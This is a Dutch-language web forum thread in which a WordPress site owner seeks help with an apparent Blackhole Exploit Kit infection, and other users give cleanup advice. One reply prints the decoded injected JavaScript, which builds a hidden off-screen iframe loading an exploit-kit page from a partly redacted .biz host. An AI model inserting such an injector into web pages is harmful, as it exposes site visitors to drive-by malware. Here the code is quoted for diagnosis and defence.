Blackhole Exploit Kit

Overzicht Reageren

Sponsored by: Vacatures door Monsterboard

Brainworx CC

Brainworx CC

14/03/2013 11:56:02
Quote Anchor link
Beste,

Ik heb denk ik last van een Blackhole Exploit Kit op mijn website.

Configuratie:
- WP 3.5.1
- Up2date plugins
- Premium theme *betaald

Ik heb diverse malen de .php bestanden doorzocht op een code die wijst naar een mogelijke oorzaak. Helaas zonder resultaat. Ik krijg zelf (en sommige bezoekers) met diverse antivirus guards zo nu en dan meldingen, van eem mogelijke dreiging.

Sucuri: OK?

web site: *url verwijderd ivm veiligheid*
status: Verified Clean
web trust: Not Blacklisted
*Cached results from a few minutes ago.

Security report (No threats found):
check Blacklisted: No
check Malware: No
check Malicious javascript: No
check Malicious iFrames: No
check Drive-By Downloads: No
check Anomaly detection: No
check IE-only attacks: No
check Suspicious redirections: No
check Spam: No

AVG: NOK?

*url verwijderd ivm veiligheid*

Kan iemand mij hierbij helpen informeren. Heb reeds de SQL en WP installatie eenmaal volledig opnieuw geinstalleerd. Dus waar dit precies ontstaat is mij geheel onduidelijk. Wellich in een file op de ftp dat geen .php is?
Gewijzigd op 24/05/2013 14:21:44 door Bas IJzelendoorn
 
PHP hulp

PHP hulp

01/03/2025 05:16:38
 
TJVB tvb

TJVB tvb

14/03/2013 12:00:53
Quote Anchor link
Heb je alle bestanden gedownload (via ftp) en met een virusscanner gescand?
 
Marvin H

Marvin H

14/03/2013 12:02:39
Quote Anchor link
Het zou ook kunnen zijn dat de hosting provider zelf is gehacked, zit je op shared hosting?
Controleer eens op bestanden die recentelijk gewijzigd zijn en check je logboeken op rare events (indien je hier toegang tot hebt)...

Toevoeging op 14/03/2013 12:07:58:

Ik zie trouwens in je broncode een raar script staan, het ziet ernaar uit dat je php files zijn aangepast...
Ik kan je wel helpen met alles te checken, stuur me anders even een PM

code verwijderd om exploit te voorkomen
Gewijzigd op 24/05/2013 15:19:03 door Joren de Wit
 
Brainworx CC

Brainworx CC

14/03/2013 12:10:44
Quote Anchor link
@TJVB, done en geen gevonden object.

@Marvin, die 1e line zie ik zelf nergens staan :S ik PM je even!
 
Marvin H

Marvin H

14/03/2013 12:14:12
Quote Anchor link
Bovenstaande 'hash' is de volgende HTML code... Duidelijk een injectie in je PHP dus...

Code (php)
PHP script in nieuw venster Selecteer het PHP script
1
2
3
4
5
6
7
8
9
        if (document.getElementsByTagName('body')[0]){
            iframer();
        } else {
            document.write("<iframe src='http://.....biz/tmpfile/node/questions.php?topnav=42&soft=633&oracle=79&virus=719&contests=730' width='100' height='100' style='width:100px;height:100px;position:absolute;visibility:hidden;left:-10000px;top:0;'></iframe>");
        }
        function iframer(){
            var f = document.createElement('iframe');f.setAttribute('src','http://......biz/tmpfile/node/questions.php?topnav=42&soft=633&oracle=79&virus=719&contests=730');f.style.left='-10000px';f.style.visibility='hidden';f.style.top='0';f.style.position='absolute';f.style.top='0';f.setAttribute('width','100');f.setAttribute('height','100');
            document.getElementsByTagName('body')[0].appendChild(f);
        }
Gewijzigd op 24/05/2013 15:16:02 door Joren de Wit
 
Brainworx CC

Brainworx CC

24/05/2013 11:59:31
Quote Anchor link
Mensen,

Ik heb echt even hulp nodig nu... heb er diverse malen nu naar gekeken, maar alsnog geeft hij weer meldingen.

http://imgur.com/ucekepZ

Iemand die de broncode in WP kan na kijken voor me?
 
Bas IJzelendoorn

Bas IJzelendoorn

24/05/2013 15:25:56
Quote Anchor link
Voor de zekerheid heb ik 2 urls en gevaarlijke code verwijderd. Gezien hier bij mij me virusscanner en de spyware scanner begonnen te protesteren bij het openen van de pagina (op phphulp). Graag het verzoek even goed opletten met welke code er geplaatst wordt en geen gevaarlijke code hier te plaatsen.[/modedit]
 
Brainworx CC

Brainworx CC

24/05/2013 15:41:48
Quote Anchor link
Maar Bas ... is er ook iemand die mij kan helpen?
 
TJVB tvb

TJVB tvb

24/05/2013 15:50:17
Quote Anchor link
Heb je alles (ook verborgen bestanden) weggehaald en Word Press geheel opnieuw geïnstalleerd?
Alle wachtwoorden aangepast?
En heb je ook de access logs na kunnen kijken?

Eventueel wil ik er wel naar kijken (pm me dan de details) maar dat zal pas volgende week gebeuren.
 
Eddy E

Eddy E

24/05/2013 21:06:40
Quote Anchor link
Inderdaad, buiten WP om even een backup van je database maken (via PHPmyAdmin oid).
Dan alles verwijderen, WP nieuw erop zetten (van schone installatie) en dan database terug zetten.

Is misschien de enige manier.
En uiteraard dit aangeven bij WP, zodat ze het gat kunnen dichten.
 



Overzicht Reageren

 
 

Om de gebruiksvriendelijkheid van onze website en diensten te optimaliseren maken wij gebruik van cookies. Deze cookies gebruiken wij voor functionaliteiten, analytische gegevens en marketing doeleinden. U vindt meer informatie in onze privacy statement.